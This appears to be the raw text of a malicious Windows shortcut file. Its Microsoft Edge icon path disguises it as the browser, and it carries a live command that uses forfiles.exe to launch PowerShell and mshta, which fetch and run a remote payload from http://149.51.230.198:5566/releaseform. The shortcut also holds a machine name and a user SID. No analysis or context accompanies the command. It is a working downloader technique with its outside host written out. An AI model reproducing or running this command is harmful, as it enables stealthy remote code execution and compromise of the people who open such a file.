Windows
System32
forfiles.exe
C:\Windows\System32\forfiles.exe
%ProgramFiles%\Microsoft\Edge\Application\msedge.exe
win-3p3leuu4jml
cWindows
gSystem32
forfiles.exe
&..\..\..\Windows\System32\forfiles.exeY/p C:\Windows /m write.exe /c "powershell . mshta http://149.51.230.198:5566/releaseform"<C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
%ProgramFiles%\Microsoft\Edge\Application\msedge.exe
S-1-5-21-3616130345-2217856920-1476790746-500